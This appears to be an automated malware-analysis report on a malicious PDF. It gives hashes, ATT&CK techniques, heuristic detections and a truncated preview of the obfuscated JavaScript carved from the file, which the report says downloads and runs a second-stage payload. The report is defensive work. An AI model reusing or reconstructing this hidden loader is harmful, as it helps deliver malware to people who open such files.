PDF malware analysis — malicious · 7a62173ca79a3d9e

MALICIOUS

PDF

14.8 KB Authoring application: 204G159G162G204G195G168G207G153G207G144G198G159G198G159G198G159G198G153G198G159G147G198G198G153G147G201G204G159G150G204G198G159G147G198G198G153G153G156G144G201G165G207G147G195G147G198G147G198G150G159G

MD5: aa073460fa4665b122f49b87a30bf5c7 SHA-1: 2658643620c61aaceef4056bfe97e73cce861cec SHA-256: 7a62173ca79a3d9e5d2c6f3efec1d244d68151860ce9af65169d8132c8eee7b6

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is a PDF file that contains embedded JavaScript, identified by multiple heuristics including 'PDF_JAVASCRIPT' and 'PDF_JS_EXPLOIT_CLUSTER'. The JavaScript code, obfuscated using string concatenation with fromCharCode, is designed to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness. The primary IOC is the name of the embedded JavaScript file.

Machine Learning

Nyx PDF Classifier malicious score 0.9999

Heuristics 6

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE

PDF has 2 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0099_000.js
144c61c4757d49304d3171f71f9cdbf9a6e5e87b8b95a3126594650a7b9a67f4 pdf-javascript-stream PDF /JS object 99 at offset 0x2D87 10775 bytes

Filename	Kind	Source	Size
`javascript_obj0099_000.js` `144c61c4757d49304d3171f71f9cdbf9a6e5e87b8b95a3126594650a7b9a67f4`	pdf-javascript-stream	PDF /JS object 99 at offset 0x2D87	10775 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script function rhjahahagk(){ var hgh="42G96G120G315"+"G183G144G17"+"7G96G315G96G180G"+"96G297G330"+"G348G177G96G31"+"5G129G129G123G"+"369G30G27G27"+"G294G351G306"+"G96G129G1"+"83G96G315G330G3"+"36G351G348G177"+"G30G27G375G30G27G342G"+"303G348G351G342G"+"330G96G294G351G30"+"6G177G30G375G30G"+"30G306G351G3"+"30G297G348G31"+"5G333G330G96G34"+"5G312G303G"+"324G324G297G33"+"3G300G303G120G32"+"4G333G291G300G255G"+"342G324G123G369"+"G30G27G354G291G3"+"42G96G34"+"5G297G333G300G303G96G1"+"83G96G102G207G198G147G"+"147G159G198G156G"+"198G153G153G201G171G1"+"62G162G168G147G2"+"01G171G144G144G"+"144G156G168"+"G144G153G156G144"+"G198G207G156G207G150G210"+"G195G207G198G144G159"+"G207G168G207G195G210G21"+"0G210G210G210G210G1"+"44G204G159G195G207"+"G159G207G156G207G156G20"+"4G159G150G204G168G144"+"G162G210G171G159G204G15"+"6G162G210G171G15"+"0G207G168G162G210G"+"171G150G210G1"+"68G162G210G16"+"8G195G207G201G16"+"2G210G195G150G201G156G"+"162G210G204G150G"+"168G150G204G204G195G201"+"G210G201G171G147G147G162G"+"162G210G195G1"+"47G204G168"+"G162G210G198G144G207G147"+"G171G201G20"+"7G159G144G207G162G2"+"10G171G162G201"+"G156G207G159G144G195"+"G198G162G204G"+"159G150G204G1"+"95G204G195G159G"+"156G171G207G159G144G2"+"01G204G159G153G210G207"+"G198G159G195G210G"+"156G204G201G147G162G1"+"71G144G207"+"G201G150G159G"+"150G210G207G195G"+"207G159G153G165G"+"195G156G144G210G147"+"G159G204G210G210"+"G198G171G147G144G153G"+"198G207G162G210"+"G171G162G201G1"+"44G207G159G144G195G"+"168G150G162G210G207"+"G168G195G195G162"+"G210G171G162G210G"+"168G207G159G144G195"+"G162G210G207G144G"+"162G195G207G159"+"G144G201G156G210G"+"198G210G198G165G150G165"+"G198G198G144G201G165G171"+"G147G198G147G1"+"98G147G198G144G"+"201G159G162G147"+"G198G147G198"+"G147G198G144G20"+"1G156G171G147G198"+"G147G198G147G198G"+"144G201G156G201G"+"147G198G147G198G147"+"G198G144G201G156G"+"165G147G198G147"+"G198G147G198"+"G144G201G165G195G147G198"+"G147G198G1"+"47G198G144G201"+"G165G204G147G198"+"G147G198G147G"+"198G144G201G165G"+"144G147G198"+"G147G198G147"+"G198G168G201"+"G168G168G204G165G"+"204G162G207G156G168G201G"+"171G165G168G201G168G"+"147G168G168G198G"+"144G147G198G"+"198G153G147G168"+"G162G204G150G147G144G"+"201G171G198G147G198G"+"147G198G147G198G144G"+"201G171G207G147"+"G198G147G198G147G"+"198G168G201G168"+"G198G168G195G207"+"G156G207G156G168G201G171"+"G147G171G162G168G168G"+"168G171G198G144G147"+"G198G198G153G147G"+"144G162G204G150G"+"147G144G201"+"G168G147G147"; function dec(input2) {var asfdsad ; var asdf =Fde(input2) ; var asfdsad = hex2a(asdf); return asfdsad;} var ded="G198G147G198"+"G147G198G162G165G"+"150G153G207G144"+"G204G159G150G204G16"+"2G204G144G147G198"+"G147G198G159G198"+"G159G168G207G2"+"01G201G198G15"+"9G147G198G198G153"+"G147G156G195G14"+"7G207G198G159G195"+"G198G147G207G156"+"G204G201G147G162"+"G171G147G147G"+"153G150G153"+"G195G147G207G1"+"56G198G168G168G1"+"71G171G165G201G195G150"+"G153G195G147G207G"+"144G168G147G171G"+"201G168G147G207G156G1"+"62G204G144G14"+"7G168G150G159"+"G210G207G144G207"+"G156G168G150G195G2"+"10G168G150G162G165"+"G147G210G207G15"+"6G207G198G162G1"+"44G150G207G207G156"+"G207G156G2"+"07G156G204G159G150"+"G204G198G159G19"+"8G159G198G147G19"+"8G153G198G159G147G1"+"98G198G153G147G201"+"G162G165G147G201"+"G207G156G171G"+"147G144G147G16"+"8G207G207G144G168G2"+"01G207G156G210G156G20"+"7G156G207G156G168"+"G201G207G156G201G156G195"+"G195G207G156G168G"+"207G207G156"+"G147G198G198G153G153G"+"144G162G204G150G"+"150G204G159G150G204G"+"198G159G168G207G198G"+"156G168G207G207G"+"165G198G159G198G"+"159G168G201G207G"+"156G207G156G207G15"+"6G150G156G198G147G147G198"+"G198G153G153G201G"+"162G204G195G153G144G168G1"+"98G147G162G204G147G147G204G15"+"9G150G204G16"+"2G204G147G2"+"01G162G165G144G"+"201G207G144G198G159G198G"+"156G168G201G201"+"G144G210G156G207G156G"+"207G156G198G147G147"+"G198G171G153G144G"+"168G147G198G198G"+"153G153G168G207G165"+"G168G198G147G168G162"+"G165G171G198G147G168G207G"+"156G171G147G144G162"+"G162G204G147G"+"159G195G204G195G159"+"G204G204G144G2"+"04G171G144G207G201G195G159G"+"162G156G204G159G204G165"+"G204G204G144G204"+"G171G147G147G165G204"+"G ... (truncated)

Detection

ClamAV: No threats found

Obfuscation or payload: likely

Carved artifact contains 1 eval/decoder/string-building token(s).

Preview script

First 1,000 lines of the extracted script

function rhjahahagk(){
var hgh="42G96G120G315"+"G183G144G17"+"7G96G315G96G180G"+"96G297G330"+"G348G177G96G31"+"5G129G129G123G"+"369G30G27G27"+"G294G351G306"+"G96G129G1"+"83G96G315G330G3"+"36G351G348G177"+"G30G27G375G30G27G342G"+"303G348G351G342G"+"330G96G294G351G30"+"6G177G30G375G30G"+"30G306G351G3"+"30G297G348G31"+"5G333G330G96G34"+"5G312G303G"+"324G324G297G33"+"3G300G303G120G32"+"4G333G291G300G255G"+"342G324G123G369"+"G30G27G354G291G3"+"42G96G34"+"5G297G333G300G303G96G1"+"83G96G102G207G198G147G"+"147G159G198G156G"+"198G153G153G201G171G1"+"62G162G168G147G2"+"01G171G144G144G"+"144G156G168"+"G144G153G156G144"+"G198G207G156G207G150G210"+"G195G207G198G144G159"+"G207G168G207G195G210G21"+"0G210G210G210G210G1"+"44G204G159G195G207"+"G159G207G156G207G156G20"+"4G159G150G204G168G144"+"G162G210G171G159G204G15"+"6G162G210G171G15"+"0G207G168G162G210G"+"171G150G210G1"+"68G162G210G16"+"8G195G207G201G16"+"2G210G195G150G201G156G"+"162G210G204G150G"+"168G150G204G204G195G201"+"G210G201G171G147G147G162G"+"162G210G195G1"+"47G204G168"+"G162G210G198G144G207G147"+"G171G201G20"+"7G159G144G207G162G2"+"10G171G162G201"+"G156G207G159G144G195"+"G198G162G204G"+"159G150G204G1"+"95G204G195G159G"+"156G171G207G159G144G2"+"01G204G159G153G210G207"+"G198G159G195G210G"+"156G204G201G147G162G1"+"71G144G207"+"G201G150G159G"+"150G210G207G195G"+"207G159G153G165G"+"195G156G144G210G147"+"G159G204G210G210"+"G198G171G147G144G153G"+"198G207G162G210"+"G171G162G201G1"+"44G207G159G144G195G"+"168G150G162G210G207"+"G168G195G195G162"+"G210G171G162G210G"+"168G207G159G144G195"+"G162G210G207G144G"+"162G195G207G159"+"G144G201G156G210G"+"198G210G198G165G150G165"+"G198G198G144G201G165G171"+"G147G198G147G1"+"98G147G198G144G"+"201G159G162G147"+"G198G147G198"+"G147G198G144G20"+"1G156G171G147G198"+"G147G198G147G198G"+"144G201G156G201G"+"147G198G147G198G147"+"G198G144G201G156G"+"165G147G198G147"+"G198G147G198"+"G144G201G165G195G147G198"+"G147G198G1"+"47G198G144G201"+"G165G204G147G198"+"G147G198G147G"+"198G144G201G165G"+"144G147G198"+"G147G198G147"+"G198G168G201"+"G168G168G204G165G"+"204G162G207G156G168G201G"+"171G165G168G201G168G"+"147G168G168G198G"+"144G147G198G"+"198G153G147G168"+"G162G204G150G147G144G"+"201G171G198G147G198G"+"147G198G147G198G144G"+"201G171G207G147"+"G198G147G198G147G"+"198G168G201G168"+"G198G168G195G207"+"G156G207G156G168G201G171"+"G147G171G162G168G168G"+"168G171G198G144G147"+"G198G198G153G147G"+"144G162G204G150G"+"147G144G201"+"G168G147G147";
function dec(input2) {var asfdsad ; var asdf =Fde(input2) ; var asfdsad = hex2a(asdf); return asfdsad;}
var ded="G198G147G198"+"G147G198G162G165G"+"150G153G207G144"+"G204G159G150G204G16"+"2G204G144G147G198"+"G147G198G159G198"+"G159G168G207G2"+"01G201G198G15"+"9G147G198G198G153"+"G147G156G195G14"+"7G207G198G159G195"+"G198G147G207G156"+"G204G201G147G162"+"G171G147G147G"+"153G150G153"+"G195G147G207G1"+"56G198G168G168G1"+"71G171G165G201G195G150"+"G153G195G147G207G"+"144G168G147G171G"+"201G168G147G207G156G1"+"62G204G144G14"+"7G168G150G159"+"G210G207G144G207"+"G156G168G150G195G2"+"10G168G150G162G165"+"G147G210G207G15"+"6G207G198G162G1"+"44G150G207G207G156"+"G207G156G2"+"07G156G204G159G150"+"G204G198G159G19"+"8G159G198G147G19"+"8G153G198G159G147G1"+"98G198G153G147G201"+"G162G165G147G201"+"G207G156G171G"+"147G144G147G16"+"8G207G207G144G168G2"+"01G207G156G210G156G20"+"7G156G207G156G168"+"G201G207G156G201G156G195"+"G195G207G156G168G"+"207G207G156"+"G147G198G198G153G153G"+"144G162G204G150G"+"150G204G159G150G204G"+"198G159G168G207G198G"+"156G168G207G207G"+"165G198G159G198G"+"159G168G201G207G"+"156G207G156G207G15"+"6G150G156G198G147G147G198"+"G198G153G153G201G"+"162G204G195G153G144G168G1"+"98G147G162G204G147G147G204G15"+"9G150G204G16"+"2G204G147G2"+"01G162G165G144G"+"201G207G144G198G159G198G"+"156G168G201G201"+"G144G210G156G207G156G"+"207G156G198G147G147"+"G198G171G153G144G"+"168G147G198G198G"+"153G153G168G207G165"+"G168G198G147G168G162"+"G165G171G198G147G168G207G"+"156G171G147G144G162"+"G162G204G147G"+"159G195G204G195G159"+"G204G204G144G2"+"04G171G144G207G201G195G159G"+"162G156G204G159G204G165"+"G204G204G144G204"+"G171G147G147G165G204"+"G
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.